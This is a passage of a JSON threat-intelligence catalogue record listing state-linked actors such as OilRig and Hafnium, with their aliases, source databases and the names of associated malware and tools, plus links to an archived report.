				"Jason",
				"MacDownloader",
				"PoisonFrog",
				"RGDoor",
				"ThreeDollars",
				"TinyZbot",
				"Toxocara",
				"Trichuris",
				"TwoFace"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "67709937-2186-4a32-b64c-a5693d40ac77",
			"created_at": "2023-01-06T13:46:38.495593Z",
			"updated_at": "2026-04-10T02:00:02.999196Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"Crambus",
				"Helix Kitten",
				"APT34",
				"IRN2",
				"ATK40",
				"G0049",
				"EUROPIUM",
				"TA452",
				"Twisted Kitten",
				"Cobalt Gypsy",
				"APT 34",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"Earth Simnavaz"
			],
			"source_name": "MISPGALAXY:OilRig",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "529c1ae9-4579-4245-86a6-20f4563a695d",
			"created_at": "2022-10-25T16:07:23.702006Z",
			"updated_at": "2026-04-10T02:00:04.71708Z",
			"deleted_at": null,
			"main_name": "Hafnium",
			"aliases": [
				"G0125",
				"Murky Panda",
				"Red Dev 13",
				"Silk Typhoon"
			],
			"source_name": "ETDA:Hafnium",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b6436f7b-6012-4969-aed1-d440e2e8b238",
			"created_at": "2022-10-25T16:07:23.91517Z",
			"updated_at": "2026-04-10T02:00:04.788408Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"APT 34",
				"ATK 40",
				"Chrysene",
				"Cobalt Gypsy",
				"Crambus",
				"DEV-0861",
				"EUROPIUM",
				"Earth Simnavaz",
				"Evasive Serpens",
				"G0049",
				"Hazel Sandstorm",
				"Helix Kitten",
				"IRN2",
				"ITG13",
				"Scarred Manticore",
				"Storm-0861",
				"TA452",
				"Twisted Kitten",
				"UNC1860",
				"Yellow Maero"
			],
			"source_name": "ETDA:OilRig",
			"tools": [
				"AMATIAS",
				"Agent Drable",
				"Agent Injector",
				"AgentDrable",
				"Alma Communicator",
				"BONDUPDATER",
				"CACTUSPIPE",
				"Clayslide",
				"CypherRat",
				"DNSExfitrator",
				"DNSpionage",
				"DROPSHOT",
				"DistTrack",
				"DropperBackdoor",
				"Fox Panel",
				"GREYSTUFF",
				"GoogleDrive RAT",
				"HighShell",
				"HyperShell",
				"ISMAgent",
				"ISMDoor",
				"ISMInjector",
				"Jason",
				"Karkoff",
				"LIONTAIL",
				"LOLBAS",
				"LOLBins",
				"LONGWATCH",
				"LaZagne",
				"Living off the Land",
				"MailDropper",
				"Mimikatz",
				"MrPerfectInstaller",
				"OILYFACE",
				"OopsIE",
				"POWBAT",
				"POWRUNER",
				"Plink",
				"Poison Frog",
				"PowerExchange",
				"PsList",
				"PuTTY Link",
				"QUADAGENT",
				"RDAT",
				"RGDoor",
				"SEASHARPEE",
				"Saitama",
				"Saitama Backdoor",
				"Shamoon",
				"SideTwist",
				"SpyNote",
				"SpyNote RAT",
				"StoneDrill",
				"TONEDEAF",
				"TONEDEAF 2.0",
				"ThreeDollars",
				"TwoFace",
				"VALUEVAULT",
				"Webmask",
				"WinRAR",
				"ZEROCLEAR",
				"ZeroCleare",
				"certutil",
				"certutil.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434439,
	"ts_updated_at": 1775792256,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8d7ccb515b66bbe8b1b0977ed512bf3a61924ea1.pdf",
		"text": "https://archive.orkl.eu/8d7ccb515b66bbe8b1b0977ed512bf3a61924ea1.txt",
		"img": "https://archive.orkl.eu/8d7ccb515b66bbe8b1b0977ed512bf3a61924ea1.jpg"
	}
}